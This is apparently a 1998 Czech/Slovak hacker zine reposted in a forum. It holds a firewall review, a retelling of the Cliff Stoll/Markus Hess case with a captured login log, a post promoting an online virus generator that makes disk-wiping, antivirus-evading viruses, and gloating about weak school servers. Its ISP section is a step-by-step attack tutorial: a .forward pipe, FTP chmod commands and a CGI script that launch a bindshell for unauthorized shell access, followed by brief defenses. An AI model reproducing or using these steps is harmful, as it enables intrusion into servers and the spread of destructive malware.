license key requirement a odfaxujeme ho na iste americke alebo nemecke
cislo mozeme cakat v e-mail-i odpoved kde nam oznamia cislo produktu (chybne
:-)) a aktivacny kluc ktory sa zadava pri instalacii firewallu. instalacia
spociva vo vlozeni instalacneho cd do drajvu a spusteni skriptu ktory spusti
dalsiu instalaciu. tu sa urci ktore sietove interfasy budu na vonkajsej sieti a
ktore na vnutornej sieti, zada sa seriove cislo eaglu ktore je napisane na
krabici a zada sa aj aktivacny kluc bez ktoreho je software nepouzitelny. potom
prebehne posledna cast instalacie ktora spociva v skopirovani suborov na hd,
registrovani virtualnych eagle adapterov, vytvorenie skupiny v start-menu a restarte
kompu.



funkcnost softwaru


po restarte kompu zacina eagle pracovat. ked mate stastie tak sa vam na
obrazovke neobjavi odporna hlaska ze najmenej jedna sluzba alebo
zariadenie nenastartovalo spravne a ze treba pouzit event viewer a mozete si
gratulovat. tak a hor' sa konfigurovat... spustime prostredie 'hawk' ktore sluzi na
pohodne ovladanie firewallu ktory je bindovany na port 418 a tade sa
odohravaju vsetky transakcie (zeby namet pre sniffery? :-)) je to riesene ako
zvisle okno v ktorom su tlacitka pre ovladanie gateway, monitoring, vytvaranie
sietovych entit, ... cize mozem povedat ze software JE funkncny :-)


skusenosti s konfiguraciou


konfiguracia nebola zo zaciatku vobec jednoducha aj ked som mal za ulohu
nastavit tento softik tak aby zvonku dovnutra ale aj znutra von pustal
oficialne len smtp traffic. ukazalo sa totiz ze bez detailneho
prestudovania manualu je spravne nastavenie naprvykrat skoro nemozne... totiz aby som
veci uviedol na pravu mieru, nemal som original aktivacny kluc, ktory som
dostal az skoro 5 tyzdnov po odoslani license key requirementu. posta sice
dovnutra chodila ale von ani za ten svet ani paket neisiel. po prestudovani
manualu a zadani definitivneho kluca sa vsetko zazracne rozbehlo na prvy krat (ale
to som stihol 4x reinstalovat winnt ;-)). chyba bola tam kde by to clovek
najmenej cakal. totiz v logfile som stale videl hlasku ze nemoze urobit
dns lookup pretoze nie je povoleny transparentny pristup. az po tyzdni som
sa v manuale docital ze ked sa nepouziva vnutorny dns, je treba vypnut dns
proxy !


potom uz len stacilo len urobit presmerovanie sluzieb z vnutorneho
interfasu eaglu na externy majlovy relay host, smtp poziadavky na vonkajsi interfas
presmerovat na interfas vnutorneho majloveho servera, majlovemu serveru nastavit ako
default gateway vnutorny interfas eaglu a vsetko bolo vybavene...


pouzivanie


no takze pouzivanie... akoze myslim ze samotne pouzivanie firewallu v
takom zmysle ako pozname pouzivanie inych softov nie je az take dolezite
pretoze vacsinou kompik kde bezi ten fw sw sa nepouziva na ine ucely a maximalne
sa na nom pozru logfiles alebo urobi udrzba firewallu.



vyuzitie v praxi


v praxi je tento firewall celkom dobre pouzitelny ked sa dobre nastavi a
ked
bezi na dobrom stroji, inac je celkove chovanie softu celkom dobre,
konfigurovanie je na slusnej urovni az teda na ten spominany problem
s aktivacnym klucom...


otis, otis(at)hysteria.sk


navrat na obsah

co ty na to ? board





zasek do zivyho 5


Prelet nad kukaccim hnizdem?


Cliff Stoll byl astronom, pracoval v Keckove observatori a vymyslel
optiku pro dalekohledy. Myslite si, ze byl hacker? Byl astronom. Jenze pak
dosly penize z grantu a Cliff byl prerazen do sklepa Lawrencovych laboratori
v Berkeley. Kdyby ve sklepe
byly brambory, stare mikroskopy a generatory elektrickych poli, a ne
kilometry ethernetovych kabelu, VAXy a IBM s VMS a UNIXem, nepsal bych o
nem ve clanku o hackerech.



Jako novacek dostal v pocitacovem oddeleni k vyreseni problem spatne
nauctovaneho strojoveho casu za 75 centu. Bylo to docela divny, protoze
mnohokrat proverene uctovaci programy zaokrouhlovaly vzdy na cele dolary.
Uzivatel, ktery po sobe tento dluh zanechal, se jmenoval Hunter. Lovec neni
zrovna bezne prijmeni. Dalsim uzivatelem, jehoz ucet se rozchazel, byl Joe
Sventek, vedec, ktery tou dobou odcestoval kamsi do Anglie.



"Mame v systemu hackera?" ptal se Cliff. Vsechny pristupy na tyto
ucty byly z externich linek. Tech bylo asi padesat. Jak hackera (je-li to
hacker) sledovat a nevyplasit ho? V noci si Cliff pujcil padesat terminalu a
tiskaren ze stolu obrylenych vedcu a zapojil kazdy z nich na jednu externi
linku. Pak si v podzemni ustredne ustlal na zemi.



Trosku sverazny chlapik? Psal se rok 1986 a v Berkeley stale jeste
prebyvali hipici a exhipici, ulitli programatori ve strojaku a studenti
nadseni svymi idealy. Cliff nebyl potrhly nebo ztresteny. Byl proste jeden
z nich.



Na tricetimetrovem vypisu z jedne tiskarny byl zaznam cinnosti hackera
(nejspis studenta z Berkeley), ktery se prihlasoval jako Sventeg a s
vyuzitim bugu v programu GNU-EMACS ziskal prava spravce systemu. Pani!
Kontroloval celou sit, co chvili cumel, zda neni sledovan, prohlizel postu
spravcum...



Ta jedna tiskarna na jedne externi lince ze site TYMNET (pozdeji pohlcen
Internetem, jinak byl docela popularni) zustala. Kazdy Hunteruv pohyb byl
zaznamenavan. Pozdeji i jeho pristup do vojenske site MILNET a prunik do
nekolika vojenskych pocitacu po celem svete.



Cliff zavolal do TYMNETu, pockal, az se Hunter zase logne, a pozadal o
vysledovani spojeni. K TYMNETu se hacker pripojoval ze ctvrti par kilometru
vzdalene od laboratori. Pak Cliff pozadal soudce o povoleni ke sledovani
telefonni linky. Sledovacka vysla, jenze telefonni cislo volajiciho Cliff
stale jeste nemel, protoze kalifornsky soudni prikaz nebyl platny ve
Virginii. Pani, Virginie, a my si mysleli, ze vola odsud z koleje! Cliff
zvedl telefon a zavolal operatorce do Virginie. Hodil s ni rec a zjistil,
ze jeji syn se zajima o astronomii, zvlast o takovou tu planetu s tim
prstynkem. Takze zabalil par velkych barevnych fotek a plakatu Saturnu a
poslal je jejimu synkovi. A dostal cislo. A to nemohl zavolat FBI? rikaji
si skalni priznivci naivnich americkych TV serialu. Mohl a taky to udelal.
Jenze vysvetlujte hlasu na drate, ze jde o bezpecnost statu, kdyz "nikdo
neprisel o vic nez milion dolaru ani o tajna data."



Linka, po ktere se hacker pripojoval, patrila spolecnosti Mitre. Mitre?
Dodavatel pocitacovych systemu pro vojenske site?! CO SE TO DO PYTLE DEJE?
Hackuje sama Mitre armadni site, nebo pouze nejaky vtipalek pouziva jejich
telefonni linku? Cliff zavolal do Mitre a narazil na hlasky typu "U NAS je
vse v NAPROSTEM PORADKU, pane!" Ze sveho domaciho Macu se pripojil k
TYMNETU a odtud k Mitre. Heslo? Zkusme stisknout enter... Ono to funguje!
V menu si vybral volbu MWCC, vytepal


CONNECT 941 486 2984.

BERKELEY COMPUTER CONNECTED.


Skrz linku armadnich expertu na pocitace se dostal do sveho kancliku.

S sefem Mitre vymenil tuhle informaci za telefonni ucty, ktere stejne nikdo
necetl.


Vysledoval linku pres satelit az do Nemecka, do Bremske univerzity.

V Nemecku, po nechutne dlouhych hyperbyrokratickych prutazich (na americke
strane), zadrzeli Marcuse Hesse, cloveka, ktery ukradene informace prodaval
KGB. Cliff se pres noc stal uznavanym odbornikem na ochranu pocitacovych
siti.



FBI nebo CIA znate z *americkych* filmu jako okamzite pracujici dynamicke
instituce. Opak zda se byti pravdou. Ve skutecnosti jde o celkem
byrokraticke organizace, ktere z vas vytahnou vsechno a nereknou vam nic -
Cliff se Hunterovo jmeno dozvedel az z nemeckych novin. Jak se ale Cliffovi
podarilo, primet je ke spolupraci?



Prohlednete si pozorne jeden vypis, zachyceny na Stollove tiskarne (prelozil
Petr Stepan):




4.2. BSD UNIX (lbl-ux4)

login: sventek
password: lblhack

Last login: Mon Dec 29 13:31:43 on ttyi7
4.2. BSD UNIC #20: Fri Aug 22 20:08:16 PDT 1986

% telnet
telnet> open optimis

****** OPTIMIS ******
Pro pripadnou pomoc volejte 695-5772, (AV)225

Username: ANONYMOUS
Password: GUEST

Vitejte v armadni databazi OPTIMIS
Jestlize pouzitim teto databaze docilite zkraceni
projektovaci doby, uspory vladnich vydaju nebo obojiho,
zaslete laskave zpravu s podrobnostmi na adresu:
mjr. Gene LeClair, velitel, OPTIMIS

VITEJTE V OPTIMISU
DATABAZE BYLA NAPOSLEDY AKTUALIZOVANA 861024 v 102724
A OBSAHUJE 3316 DOKUMENT

Tato datova baze je vytahem z AR 25-400-2, Modemoveho armadniho
zaznamoveho systemu, k usnadneni identifikace informacnich souboru.

Zadejte laskave slovo nebo "EXIT".

/sdi
Slovo "sdi" nebylo nalezeno.

Zadejte laskave slovo nebo "EXIT".

/stealth
Slovo "stealth" nebylo nalezeno.

Zadejte laskave slovo nebo "EXIT".

/sac
Slovo "sac" nebylo nalezeno.

Zadejte laskave slovo nebo "EXIT".
/jadern

Dekuji vam.
Nalezl jsem 29 doklad(u) obsahujici(ch) frazi "jadern".

POLOZKA/ZNACKA TITUL
= = = = = = = = = = = = = = = = = = = =
1 20-1f IG inspekce (Hlavni stan, Ministerstvo obrany)
2 50a Jaderne, chemicke a biologicke otazky narodni bezpecnosti
3 50b Kontrola jaderneho, chemickeho a biologickeho zbrojeni
4 50d Formulovani jaderne a chemicke strategie
5 50e Jaderne a chemicke problemy vojenske politiky
6 50f Jaderne a chemicke pozadavky
7 50g Predpokladane jaderne a chemicke moznosti
8 50h Scenar rozvoje struktury jaderne sily
9 50i Priprava rozpoctu pro jadernou a chemickou vyzbroj
10 50j Jaderny a chemicky pokrok a statisticka hlaseni
11 50k Vojensky jaderny, chemicky a biologicky obranny program
12 50m Analyzy vydaju na jaderne a chemicke zbrane
13 50n Vedecke a technicke informace o jadernych a chemickych
zbranich a biologicke obrane
14 50p Jaderna velitelska a ridici spojeni
15 50q Jaderne a chemicke odzbrojeni
16 50r Jaderne a chemicke plany
17 50-5a Postup pri jadernych nehodach a incidentech
18 50-5b Rozmisteni jadernych jednotek
19 50-5c Soubory k jaderne bezpecnosti
20 50-5d Obnova jadernych stanovist
21 50-5-1a Soubory k rekonstrukci jadernych stanovist
22 50-115a Soubory k jaderne bezpecnosti
23 55-355FRTd Rizeni vnitrostatni prepravy
24 200-1c Soubory o nakladani s nebezpecnymi materialy
25 385-11k Pripady radiacnich incidentu
26 385-11m Licence na radioaktivni materialy
27 385-40c Pripady radiacnich incidentu
28 700-65a Soubory k mezinarodni jaderne logistice
29 1125-2-300a Vyrobni data

TITUL: Jaderne, chemicke a biologicke otazky narodni bezpecnosti
POPIS: Dokument se tyka vnitrni, zahranicni a vojenske politiky pri
vyuzivani atomove energie, pouziti jadernych a chemickych zbrani a
biologicke obrane ve vztahu k narodni bezpecnosti a narodni urovni
krizoveho rizeni. Zahrnuty jsou studie, akce a smernice vztahujici se
k nasledujicim institucim a osobam a jimi vydane:
prezident, Rada narodni bezpecnosti, poradce prezidenta pro zalezitosti
narodni bezpecnosti a meziministerske skupiny a vybory zamerene
na zalezitosti narodni bezpecnosti ve vztahu k jadernym a chemickym
zbranim a biologicke obrane.


Na tomhle miste se (PRY) Cliffova tiskarna zasekla. Rozhodne dost nato,
aby zburcoval (konecne) CIA. Chytit Marcuse Huntera Hesse se podarilo taky
diky tomu, ze Cliff se svou pritelkyni vytvoril v pocitaci LBL rozsahlou
databazi fiktivnich dat o SDI (strategicka obrana iniciativa - "hvezdne
valky"). Stahovani tehle dat zdrzelo Hesse natolik, ze se podarilo
vysledovat jeho linku az do Nemecka a zatknout ho primo pri cinu.



Marcus Hess byl hacker na volne noze. Pracoval v male softwarove firme v
Hannoveru. Mezi jeho pratele patrili lide s prezdivkami jako HAGBARD,
PENGO a BRESINSKY.



HAGBARD (Karl Koch) byl programator a taky fetak a potreboval prachy na
koks. A taky byl Hunteruv kamos. PENGO mel kontakt na KGB. Skupoval tajne
informace od hackeru v celem zapadnim Nemecku a KGB je prodaval ve
vychodnim. Za Hessovy sjetiny a pristupova hesla dostal 30 000 Marek.
Podle vseho vsak prodal i svoje pracovni postupy a strukturu Milnetu.


29. cervna 1987 vpadla nemecka policie do Hessova bytu, zabavila asi stovku
disket, pocitac a dokumentaci k jeho hackerskym kouskum. Druheho brezna
1989 byl cely hackersky tym obvinen ze spionaze. Hess byl propusten na
kauci, po procesu dostal podminku. Hagbard se upalil.



Cliff Stoll se vratil ke svym dalekohledum. Ale bremena sve slavy se uz
nikdy nezbavi. O svem pachteni se za hackery napsal knihu Kukacci vejce,
ktera vysla i cesky, loni v Mlade fronte.



Kangaroo, kangaroo(at)hysteria.sk


navrat na obsah

co ty na to ? board




kterak privest antivirove firmy k silenstvi?



inu, to neni zas tak tezke. pokud jistym lidem z grisoftu vadilo, ze z
me stranky bylo mozno stahnout
par starych, dobre znamych a snadno odhalitelnych viru, tak novy
virus generator
on-line
je totalne uzemni :) jedna se o cgi-skript, ktery
podle zadanych parametru vyprodukuje vir na prani. parametry se zadavaji
ve webovem prohlizeci, takze si kdejaky lamer, ktery neumi nic jineho,
nez klikat v netscapovi, bude moct vyrobit vir, ktery v urcenou dobu
napise na obrazovku zadany text a pripadne vymaze disk. nejsem priznivcem
destruktivnich akci a kvalitu viru nemerim podle poctu stop naformatovanych
pri aktivaci, ale ukazuje se, ze niceni disku ma u lidi, kteri
muj generator pouzivaji, velkou oblibu, proto tam takovou funkci davam.
ostatne kazdy vi, co dela, a ja nevidim duvod byt moralnim soudcem lidstva.



pokud bude nekdo chtit testovat (pouze pro ne-antivirove ucely) viry z
v.g.o.l., muze pouzit funkci 'experimentalni virus'. Vir se pak bude ptat,
zda muze infikovat soubory nebo vlezt do pameti, a tak nehrozi nekontrolovane
rozlezeni po pocitaci. muze to byt pouzito treba pri testovani scan a replace
stringu pro novy antivir.



v.g.o.l. negeneruje porad stejne viry, viry mirne mutuji.
rnd seed je vsak nastavovan podle data, takze pokud si nejaky chytrak
vyrobi najednou 10000 viru, budou vsecky stejne. tvar viru se meni pouze
jednou za nekolik dnu. dalsi vyhodou oproti klasickym generatorum je, ze
okamzite pote, co proti tomu napisou antiviraci algoritmus, muzu v.g.o.l.
aktualizovat a vyhnout se odhaleni. samozrejmosti je moznost nalezt
v pameti a zneskodnit nejznamejsi a-v residenty (pokud vis o nejakem, ktery
tam neni uvedeny, posli mi prosim scan string a replace string).
zadny a-v zkratka nema proti v.g.o.l. sanci :)



a jak se muzes ty, prosty uzivateli, branit proti teto nove technologii
informacniho teroru? ani to tak tezke neni. staci zapomenout na to vsechno,
co vyzvracel macrosoft, a instalovat nejaky operacni system - treba linux.



maddaemon, maddaemon(at)hysteria.sk


navrat na obsah

co ty na to ? board



inet na strednej skole #2



Takze tentokrat nieco z praxe. Nieco o bezpecnosti skolskych serverov.
Musim podotknut ze admini su skutocni lameri len s priemernymi a niekedy
skoro ziadnymi znalostami unixu, vacsinou su nimi studenti vysokych skol,
ktori zvladaju maximalne tak instalaciu nejakeho toho slackwaru, pre istotu
starsej verzie, ved ked uz tam maju byt nejake tie bugy, nech ich aspon nie
je malo :-). Shadowovanie passwordov im zvacsa vela nehovori a ak aj nahodou
zistia, ktore konto bolo zneuzite na hackovanie, riesia to vacsinou
zamedzenim toho konta miesto toho aby sa radsej postarali o objavenie chyby
a jej nasledne zaplatanie. Zatial mily hacker veselo vklzne dnu cez jedno zo
100 rozkryptovanych hesiel ktorych decryptovanie zabere zhruba tak pol
minuty kedze "dokonale" starsie linuxy povoluju hesla typu: deti, maco,
peter a podobne, co su pre dekryptovaci algoritmus fakt "tazkym" orieskom.


Uplnou korunou vsetkeho bol rootovsky password atreides isteho nemenovaneho
slovenskeho gymnazia. Na tomto smutnom priklade vidiet ze admin s oblubou
hrava Dunu a vzal by som jed na to ze sa nevyhne I takym "bonbonikom" akymi
su doom ci quake beziaci pod linuxom, pre istotu uz davno exploitnuti,
miesto toho aby radsej sledoval rootshell ci bugtraq. Tieto sajty vsak
radsej sleduju studenti (mam na mysli users s accountmi na skolach),
ktorych admini priam nabadaju k hackovaniu (ista nastenka na istej
bratislavskej skole obsahujuca okrem neskodnych zoznamov irc chatov ci
vyhladavacich enginov i sajty pre crackerov a hackerov). Admini su priam
posadnuti tuzbou byt hacknuti. Ked uz ide skutocne do tuheho, tak ochranu
riesia zamedzenim telnetu z tzv. Untrusted machines, co na tom ze hacker si
uz davno odsniffoval hesla dovernych masin a veselo sa vracia nazad z masin
ktorym server veri, pre istotu uz ako root :-))). Pre istotu keby tento
sposob zlyhal, este vzdy fici secure shell o ktorom akoze "nikto" nema ani
paru ani slychu. Nakoniec si nasi "mudri" admini daju tu namahu a
preinstaluju distribucie, samozrejme paralelne na vsetkych strojoch o
ktore sa staraju a nechaju ich napospas rovnakemu exploitu, ktory zaisto
bude o chvilu zverejneny na jednom z adminmi reklamovanych nastenkovych
sajtov. Zaverom by som chcel popriat vela stastia a zaloznych kopii
(pretoze nie vsetci hackeri byvaju mierumilovni a uspokoja sa so zmenenim
stranky a este k tomu jej zalohovanim) nasim adminom a dat im radu do
zivota: vonku svieti slniecko, tak napiste radsej shutdown -h NOW a hor
sa okopovat zahradku, popr. Si najdite zensku a vyjdite si s nou von, ved
nie len pocitacmi je clovek zivy. Absinthu zdar a #holubniku obzvlast :-)



kocman, kocman(at)hysteria.sk

31.3.1998 Slavin, Bratislava


navrat na obsah

co ty na to ? board









00000001000001020061730200618836
hromisko
 hromisko      03.03.2004 - 10:51:09 , level: 1, UP   NEW

00000001000001020061730200618180
hromisko
 hromisko      02.03.2004 - 22:22:09 , level: 1, UP   NEW


::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #3, 4.3.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/



intro



nazhromazdilo sa mi doma kopu materialov, takze vypustam tretie cislo
prielomu par dni po druhom. pokial xcete dostavat e-mailom oznam ked
vyde nove cislo prielomu, poslite mejl s textom
"subscribe prielom" na adresu prielom(at)hysteria.sk.





0000000100000102006173020061818000628620
hromisko
 hromisko      09.03.2004 - 15:40:02 , level: 2, UP   NEW
surfovanie po inet provideroch

iste viete ze vacsina slovenskych internet providerov neposkytuje shell konta
na svojich unixovych serveroch. pokial poskytuju nejaky pristup na svoje servery,
tak je to vacsinou iba ftp, aby si uzivatel mohol napriklad updatovat svoju
www stranku. ochranu proti interaktivnemu (telnet) pripojeniu maju vacsinou slovenski
provideri ale velmi, velmi chabu. nastavenie priemerneho unix servera inet providera by
som charakterizoval takto :

- uzivatel ma pristup na server cez ftp

- telnet je zakazany tak, ze uzivatel ma ako shell nastaveny "/dev/null"

- telnet je zakazany pomocou hosts.deny alebo hosts.allow

boom, a tu vznika elementarny bezpecnostny problem. pokial ma uzivatel ftp pristup
a pokial ma vlastny home adresar, do ktoreho moze zapisovat, nie je problem ziskat
interaktivny pristup na server pomocou finty s ".forward". tato metoda je
dost stara, ale zjavne je az natolko stara, ze sa na nu zabudlo. bavil som sa nedavno v
blave na #holubnik irc session s par ludmi a oni sa ma na to pytali - a tak skrsla
idea napisat o tom do prielomu.



postup je jednoduchy - staci uploadnut .forward na server providera a do neho
vlozit prikaz na execnutie prikazu. totiz sendmail standardne povoluje execovanie
suborov. staci vyrobit si nasledovny .forward subor :



$ cat .forward
|/tmp/scriptik
$


tento subor treba uploadnut do domaceho adresara. potom si pripravime
subor "scriptik", napriklad takto :


$ cat scriptik
/tmp/bindshell &
$


bindshell je program, ktory otvori shell na vysokom porte. da sa stiahnut
z arxivu (http://hysteria.sk/arxiv). aby sa fajly mohli execnut, musia byt executable.
to sa da spravit cez prikaz "quote site chmod", takto :


$ ftp -nv
ftp> o server.provider.sk
Conected to server.provider.sk
ftp> user login heslo
ftp> cd /tmp
ftp> quote site chmod 755 bindshell
ftp> quote site chmod 755 scriptik
ftp> close



nuz a teraz staci poslat na to konto nejaky mejl, trebars prikazom "echo test | mail login@provider.sk".
sendmail spusti /tmp/scriptik a ten spusti bindshell. potom staci telnet na vysoky port,
a ziskate interaktivny pristup na server.


ako sa proti tomu branit ? jednoducho - treba obmedzit alebo znemoznit spustanie programov cez sendmail, je na to
program ktory sa vola smrsh (http://nic.zcu.cz/ftp/pub/security/cert/tools/smrsh). druha moznost je
nainstalovat iny postovy klient, napriklad smail neumoznuje defaultne execovanie akychkolvek suborov.
druhy sposob je nakonfigurovat system tak, aby uzivatel nemohol zapisovat do svojho domaceho
adresara.



specialna sranda vznikne ked je verejne zapisovatelny adresar anonymneho ftp. tym padom je mozne
spravit vyssie popisany utok bez toho aby mal clovek na masine konto, je to potom kompletne
externy utok. nastastie sa vsak uz asi tazko najde na nete server so zapisovatelnym root ftp adresarom.
je ale mozne spravit script na kontrolovanie anonymnych ftp serverov a behom jednej noci otestovat
takto tisice serverov. mozno by to viedlo k prekvapivym vysledkom.



dalsi sposob, akym moze ziskat uzivatel interaktivny pristup na providerov
server su cgi scripty. pozrite sa do srm.conf vaseho httpd daemona. vacsina
www serverov je nakonfigurovana tak, ze spustaju hocijaky subor s priponou .cgi
ako cgi script. srm.conf sa to konfiguruje riadkom :



AddHandler cgi-script .cgi



potom staci ak si medzi html fajly strcite script, ktory vam execne vyssie
spominany bindshell.. trebars taketo nieco :


#!/bin/sh
cat << EOF
Content-type: text/html

spustil sa bindshell...
EOF
/tmp/bindshell &




internet provideri na slovensku este stale trpia na horucku z amaterskeho
nadsenia, sprevadzajucu vsetky zacinajuce hi-tech odvetvia. na unix
administraciu nie su skoly, ucitelia, kurzy, ani knizky. servery drzia
v rukach samoukovia-nadsenci, ktori cerpaju rozumy z downloadnutych
HOW-TO fajlov, pokial zrovna nebehaju po klientoch a neinstaluju dial-up tcp/ip na
windows. preto nie je tazke oblafnut ich jednoduchymi trikmi a obist
tenke ochrany ich serverov. a mozno aj preto vyzera uroven sluzieb providerov
tak ako vyzera, ale to uz je tema na dalsi dlhy zimny vecer. o tom nabuduce :)


0000000100000102006173020061818000628619
hromisko
 hromisko      09.03.2004 - 15:38:57 , level: 2, UP   NEW

0000000100000102006173020061818000628617
hromisko
 hromisko      09.03.2004 - 15:38:25 , level: 2, UP   NEW
reportaz z cZert session



Kolem CzERT SESSION bylo na ceskem a slovenskem internetu
docela zivo. Na webu se valely velke reklamni bannery,
oznamujici, ze sraz je 17. ledna v 18 hodin u Vaclava na
Vaclavaku v Praze.


Kdyz jsem prisel ke koni, upoutala me na prvni pohled
skupina vystredne (kyberpunkove) oblecenych lidi. Obcas k nim
nekdo jim podobny prisel, podali si zvlastnim zpusobem ruce a
debatovali v jakemsi subkulturnim slangu. Meli vsichni strasne
divny boty. Byli mezi nima i typkove, co vypadali presne jako
zadrzeni hackeri z novin, dlouhe vlasy, plnovous, divoke oci,
obleceni v cernem. Prava subkultura. Prichazeli mezi ne dalsi a
dalsi a me jen udivovalo, ze je mezi nimi docela velke procento
zen. Hackerky? Asi tezko, ale proc by hacker nemohl vzit na
session - spolecenskou udalost pocitacoveho undergroundu - svou
pritelkyni? Skupinka se stale rozrustala a ja, sedice na lavicce,
pozoroval jsem jednim okem je a druhym par !NENAPADNICH!
fotografu a kameramanu, kteri se, JEN TAK prochazeli kolem,
fotaky otevreny, prsty na spousti, cervena svetylka kamer svitila
do stale houstnouci tmy.


Par prislusniku teto zvlastni subkultury se obcas odtrhne a
odejde kamsi -- napred. Obavam se, ze vypadam malo vystredne.



O kus dal stoji skupinka nekolika naprosto NORMALNICH lidi,
co kdyz TO jsou ONI. Posouvam se mezi obe skupinky. Ze skupinky
CYBERPUNKERU se ozyva sluvko INFORMACE, kdosi z NORMALU rek
IMEJL. To ale nic neznamena, mejl prece pouziva kazdej.



Jmeno PAJKUS, ktere zaslechnu od NORMALU me presvedcilo.
Hackeri nevypadaji jako HACKERI, co je znate z filmu, nepoznate
je od Tomase Stuchlika z vasi tridy. Nebavej se ani moc o
pocitacich. Kyberkultura, vybasnena Gibsonem a Sterlingem, jako
by se jich netykala.

Prichazi Pajkus.

Grupa se vydava po silnici dolu po Vaclavaku. Auta se
vyhybaji skupine asi dvaceti nejvetsich hackeru z Cech a ze
Slovenska. Ptam se Pajka prave na kyberkulturu.
"Jediny, co se me z kyberkultury tyka , je iRC. Vecer sednu k
pocitaci, pokecam s kamaradama a potom nekdy beham po nejakych
tech masinach."

Hackeri dorazi "na misto" - do restaurace Ve Zlate, ktera
pozdeji vstoupila do dejin policie.

"Miro, bude pristaveny autobus do Bartolomejske?" vtipkuje kdosi.

"No jasne, puvodne jsme to chteli udelat v te kavarne primo
naproti prezidia, abychom si jenom poposli..."



Nad veceri se hackeri, dosud vesmes mlcici zacinaji
rozpovidavat, diskuse se docela slusne rozbiha. Kdyby dlouhy stul
obsazeny kosatym rodinym klanem obhledl nekdo nezasveceny, tipnul
by si, ze si proste par studentiku zaslo na veceri a docela dobre
se bavej. Oblibena barva hackeru je cerna a vetsinou to i sedi
(jen Pajkus ma bilou kosili).

Pajkus ma nyni firmu, ktera se stara o bezpecnost
pocitacovych siti. Jako hacker vi, kde jsou v systemu skviry, ale
zna i postupy na jejich zatmetleni. Je schopen zarucit maximalni
bezpecnost, simulovat hackerske utoky... Neni to "nemoralni",
pouzivat vedomosti ziskane jakymsi SKODENIM k nejakemu odobnimu
prospechu?

"Proc?" smeje se, "hackeri budou vzdycky napred pred
adminama. Admin jenom mzoura za serverem a kdyz obcas nekdo
zautoci, ucpe sem tam nejakou diru. Ale kdyz ja beham po
masinach, muzu na jeho stroj utocit cele tydny, zkoumat ho a
hledat skulinku, vzdycky jsem jako hacker napred."

"Ma informace," doplnuje ho Ook, "tak je pouzije."

Pajkus, Ook a MiRaGe se mi snazi vysvetlit, ze hacking, tak
jak je delaji cZerti neni nic spatneho.

Stale me desi to, ze hacker, ktery profesionalne zabezpecuje
site, si muze nekde nechat skulinku, backdoor.

"CzERT, ten folklor kolem toho a vsechno to ostatni -- to
byla jenom studentska prca. Recese, tak jak to studenti delavaji.
Nikdy nemicham CzERT a business dohromady."



Z Ooka se vyklubal filozof mezi hackery. Mluvi v dlouhych,
uhledne skladanych vetach, klidne, snazi se mi vysvetlit filozofii toho,
co je pro ostatni zlocin.

V dnesni dobe muze hackovat kdokoliv. K dispozici jsou
prirucky pro zacatecniky i pokrocile, hackerske utility, popisy
der (bugu)... CzERTE na svych strank ch nabizeji utlity, se
kterymi uz musite umet pracovat. Hrebiky, drevo, zelezne soucasti
a titevu, ze kterych si samostril sice postavite, ale musite to
umet.

"Pokud nekdo zverejni popis bugu, je to jedna vec. Kdyz
nekdo zverejni bug a zpusob, jak ho zneuzit, je to vec druha. A
kdyz nekdo zverejni utilitu, kterou staci jenom zkompilovat a
shazujes masiny, je to taky neco jinyho. Jsou k dispozici
programy, ktery akorat zkompilujes a uz to pada. TO me desi. a TO
mi prijde nemoralni, kdyz nekdo zverejnuje takovyhle veci.
Predstav si trinactiletyho pubertaka, kterej si rika hacker..."

"Pockej," prerusuje ho Pajkus, "trinacti se mi zda dost
malo..."

"Jo, par takovejch jsem videl," nenechava se vyvest z
rovnovahy, "vis, jak si prijde silnej? Je boss, stahne si
nejakyho Nuka a schodi masinu."

"No vlastne jenom zresetuje..."

"Jo, jenze jak to nabutuje, hodi to znova."

"WinNuke je nejhorsi," dodava MiRaGe, "je to normalni
windousovej Drag-n-Drop, Kazdej, kdo vi, co to je mys, s tim umi
zachazet..."

Zacinam sdilet jejich obavy. "Je mozny shodit treba celou
domenu?" ptam se.

Ne, routery jsou stale jeste dobre chraneny. Ale tak pred
rokem, kdyz se objevil jeden novy bug, to mozny bylo.
Zamindrakovanej pubertak mohl shodit klidne cely cesky internet."

A co technicky reseni. Jak je tezke hackovat?

"My cZerti jsme vlastne meli docela stesti," prozrazuje
Pajkus, "ze jsme objevili jeden docela neznamy bug, jinak ty
utoky byly na docela nizke technicke urovni."

Rutina. Na hacknuty server (tak dva az tri denne) se umisti
presmerovavac paketu (redirector). Prikazy, ktere hackeri pouzivaji, jsou
zdanlive odesilany z tohoto stroje.

"Pres dva tri redirektory me nema nikdo sanci vystopovat,"
zacina se chlubit Pajko.

"Ale ma," krouti hlavou Ook.

"Jo, ale musel by bejt stejne dobrej jako ja. Nebo lepsi," usmeje se.

"Jenze u nas neni nikdo, kdo by te sledoval. Jednou jsem
neco hackul a asi za tyden mi prisel mejl s takovym smesnym
obsahem jako HA, HA, DOSTAL JSEM TE! !!!BOOOOM!!!, PRASKLO TO - a
podobne. Ten spravce, misto aby si to spravil, me tejden hledal
na webu. A pritom o anonymitu nejak moc nedbam."

Na radu prichazeji historky o navstevach agentu FBI na CVUT
a univerzite v Bratislave -- studenti se obcas pokouseji
probourat do americkych vl dnich pocitacu.


Dostavame se tedy k otazce bezpecnosti hackovani pro
samotneho hackera.

"Nebojis se, ze nejaky nastvany spravce po tobe bude patrat
a najde te?"

"Najde, proc by nenasel. Ale nic se nestane. Co by mi
udelal? Jel by za mnou az na Slovensko? To by se mu ani
nevyplatilo. To jako, ze by na me poslal nejake korby, aby mi
daly nakl dacku? Proc? Snazim se neskodit. Vetsinou nejaka zmena
stranek jeste udela tomu serveru reklamu."

Vycituji na jednu stranu jakousi symbiozu mezi spravci serveru a hackery a
na stranu druhou i nelitostny boj. Dost casto je hacker admin a
dobry admin je nekdy hacker. Ale nejde nekdy souboj az na ostri
noze?

"Slovensko je preci jenom na vychode, bliz Ukrajine. My si
na takovehle veci najimame ukrajinske delniky," rika s usmevem na
tvari, ale najednou zvazni. "Jednou jsem honil jednoho
hackera..."

"Hacker honil hackera?"

"Jo, hledal jsem takoveho darebaka, schodil jisty mistni
